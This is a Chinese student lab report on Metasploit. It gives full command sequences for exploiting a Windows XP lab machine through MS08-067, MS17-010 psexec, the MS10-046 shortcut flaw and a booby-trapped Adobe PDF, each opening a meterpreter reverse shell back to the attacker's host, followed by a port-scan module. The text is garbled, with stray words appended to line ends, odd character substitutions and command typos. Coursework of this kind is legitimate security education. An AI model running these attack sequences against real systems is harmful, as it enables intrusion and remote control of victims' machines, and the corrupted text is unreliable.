本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html
1.1一個主動攻擊實踐,如ms08_067; (1分)shell
1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)windows
1.3 一個針對客戶端的攻擊,如Adobe;(1分)api
1.4 成功應用任何一個輔助模塊。(0.5分)瀏覽器
以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。安全
用本身的話解釋什麼是exploit
,payload
,encode
.ruby
用本身感受通俗的話來講:網絡
exploit
: msf用來攻擊的一種模塊工具。
payload
: 老師上課說的,用來將msf生成的shellcode送到執行攻擊程序的代碼裏去。
encode
: 主要功能是編碼,就是假裝攻擊代碼,讓它可以繞過「壞字符」,從而能正常地攻擊靶機,避免出現因「壞字符」而出現問題。session
MSF的六種模塊架構
攻擊方:Kali(192.168.154.152) 靶機:WindowsXP SP3(English)(192.168.154.153)
Ms08_067_netapi是一款Metasploit中有點老的溢出攻擊載荷,攻擊能夠得到一個相對高的權限。
首先,咱們能夠先掃描一下靶機有哪些漏洞,我找到了一篇博客----metaaploit利用漏洞滲透靶機,裏面介紹的很詳細。有兩個指令能夠掃描:nmap -O 靶機IP
和nmap --script==vuln 靶機IP
。咱們能夠都來試一下:
nmap -O 192.168.154.153
,如圖所示,呵呵,什麼鬼。nmap --script==vuln 192.168.154.153
,如圖所示,咱們能夠發現有兩個漏洞:ms08_067
和ms017-010
,咱們能夠都試一下。msfconsole
,查看一下ms08_067
,輸入search ms08_067
,咱們能夠看到在攻擊模塊中確實存在這樣一個漏洞exploit/windows/smb/ms08_067_netapi
。咱們就利用這個漏洞來進行攻擊,輸入use exploit/windows/smb/ms08_067_netapi
。
接下來,問題又來了,用什麼攻擊載荷payload
來進行攻擊呢?咱們能夠輸入show payloads
來查看一下。
咱們能夠看到不少可用的payload
,我就選擇一個咱們前幾回實驗沒有用過的generic/meterpreter_reverse_tcp
吧,輸入set payload generic/meterpreter_reverse_tcp
來設置相關參數。
那麼,問題又來了,有哪些參數須要設置呢?咱們能夠輸入show options
來查看。
咱們能夠看到咱們須要設置的有RHOST----被攻擊的靶機IP
。
set RHOST 192.168.154.153
,在這裏,其實其餘的參數就不用設置,只不過一開始作實驗比較保守,就給設置了,嘻嘻。設置好參數後,輸入exploit
開始攻擊。
攻擊成功就會顯示如圖所示畫面。
輸入一個指令dir
,就會顯示全部文件了。
接下來咱們嘗試一下ms017_010_psexec
。
msfconsole
,輸入search ms017_010
搜索一下。咱們能夠看到這樣的漏洞存在3個,前兩個都有人作過,咱們試一下第3個ms017_010_psexec
。
輸入use exploit/windows/smb/ms017_010_psexec
使用這個漏洞模塊。
接下來,咱們仍是輸入show payloads
看看有哪些可用的攻擊載荷。
windows/meterpreter/reverse_tcp
,輸入set payloads windows/meterpreter/reverse_tcp
,這裏顯示的參數一大堆,不過好多都已經默認了,咱們只須要設置LHOST
就好。set LHOST 192.168.154.152
,其餘的不用設置,本身又保守了。exploit
進行攻擊,哇,出現了終端,輸入dir
,成功了,開心地蹦起。攻擊方:Kali(192.168.154.152) 靶機:Windows XP SP3(English)(192.168.154.153)
cd /usr/share/metaploit-framework/modules/exploit/windows/browser
查詢看一下有什麼漏洞能夠攻擊,如圖所示,發現一個漏洞ms10_042
.msfconsole
進行查詢。search ms10_042
,搜索該漏洞。info exploit/windows/browsers/ms10_042_helpctr_xss_cmd_exec
來查詢該漏洞,咱們能夠看到相應靶機。這裏看到的靶機是自動搜索的。
use exploit/windows/browsers/ms10_042_helpctr_xss_cmd_exec
,使用該模塊。payloads
,我選擇windows/meterpreter/reverse_tcp
的攻擊載荷,輸入set payload windows/meterpreter/reverse_tcp
,並輸入show options
顯示相應參數,發現咱們只須要設置LHOST
。exploit
進行攻擊,遺憾的是,沒有彈出相應連接入口,攻擊失敗。攻擊方:Kali(192.168.154.152) 靶機:windows xp sp3(English)(192.168.154.153)
根據剛纔在/usr/share/metaploit-framework/modules/exploit/windows/browser
中看到的漏洞,咱們能夠看到還有一個漏洞ms10_046_shortcut_icon_dllloader
仍是剛纔的思路,輸入命令
search ms10_046 //查詢該漏洞的路徑 info exploit/windows/browser/ms10_046_shortcut_icon_dllloader//查詢該漏洞相應的信息 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader//使用該漏洞 show payloads//展現該漏洞相應的攻擊載荷 set payload windows/meterpreter/reverse_tcp//設置相應的攻擊載荷的參數 set LHOST 192.168.154.152 set SRVHOST 192.168.154.152 set RHOST 192.168.154.153 exploit//開始攻擊
http://192.168.154.152:80
,如圖所示。sessions
,咱們就能夠看到創建會話的ID。sessions -i 1
,打開session,成功(長舒一口氣)。攻擊方:Kali(192.168.154.152) 靶機:windows XP sp3(192.168.154.153)
步驟:
msfconsole//打開msf search adobe//查找與adobe有關的漏洞 use windows/fileformat/adobe_cooltype_sing //使用攻擊模塊 set payload windows/meterpreter/reverse_tcp//設置攻擊載荷 set LHOST 192.168.154.152 set FILENAME 20165203.pdf//設置生成文件的文件名 exploit//攻擊
root/.msf4/local/
下,咱們能夠進入此路徑,找到該文件。20165203.pdf
複製到靶機中。back
退出當前模塊,開始監聽use exploit/multi/handler//使用監聽模塊 set payload windows/meterpreter/reverse_tcp//設置攻擊載荷 set LHOST 192.168.154.152 exploit//攻擊
在靶機中打開相應的後門文件20165203.pdf
。
如圖所示,攻擊成功,這個沒有遇到太多困難。
msfconsole
後,我用show auxiliary
來展現一下輔助模塊,發現了不少掃描端口的模塊。我也上網搜了一下,這些標識的內容:
ack:經過ACK掃描的方式對防火牆上未被屏蔽的端口進行探測; ftpbounce:經過FTP BOUNCE攻擊的原理對TCP服務進行枚舉 syn:使用發送TCP SYN標誌的方式探測開放的端口 tcp:經過一次完整的TCP連接來判斷端口是否開放 xmas:一種更爲隱蔽的掃描方式,經過發送FIN,PSH,URG標誌可以躲避一些TCP標記檢測器的過濾
auxiliary/scanner/portscan/syn
模塊,輸入use auxiliary/scanner/portscan/syn
使用這個模塊。show options
來查看參數。set RHOST 192.168.154.153//設置靶機地址 set THREAD 50//設置線程數
run
運行nmap
的相關指令對主機進行掃描,如圖所示,輸入nmap -sS -Pn 192.168.154.153
對靶機進行掃描。經過上面的實驗,咱們能夠總結出使用MSF攻擊通常有兩種思路:
nmap -O 靶機IP 或 nmap --script==vuln 靶機IP//掃描靶機上的漏洞 msfconsole//打開msf search 漏洞關鍵字//找出模塊的路徑 開始進行一系列攻擊
進入相應文件夾查找漏洞 msfconsole//打開msf search 漏洞關鍵字//找出模塊的路徑 info 模塊路徑//查詢模塊的信息,尤爲注意target,根據target信息來找相應的靶機 進行一系列攻擊
基本遇到的問題就是一直在找靶機,找Target對應的版本,遇到了一個小問題,但願對你們有幫助。
Q:在攻擊Adobe時,生成的20165203.pdf
文件沒有找到,甚至/root
下的msf4/local/
也沒有找到。
A:當時本身的反應是文件夾被隱藏了,因而我經過點擊右上的下三角,將顯示隱藏的文件
勾上便可。
我感受目前咱們對漏洞的分析仍是具備必定的侷限性,僅限於從網上找一些你們攻擊過的漏洞來進行攻擊。要想達到實戰的能力,咱們還應有探索的勇氣,勇於找到一些新的攻擊模塊,本身一步一步查詢相應的靶機,查詢相應的參數來進行設置,因此,仍是須要多多實戰。
經過本次實驗,我對MSF有了更深的理解,原來本身一直分不清msf
、metaploit
、msfconsole
和meterpreter
的關係,如今也明白了metaploit
是msf
的一個版本,msfconsole
是msf
的一個接口,meterpreter
是msf
的一個工具。 本身也經過實驗總結了使用MSF攻擊的思路和通常步驟,此次實驗真的頗有收穫,可是《網絡對抗》仍是一個實戰性的科目,本身還須要多多實踐。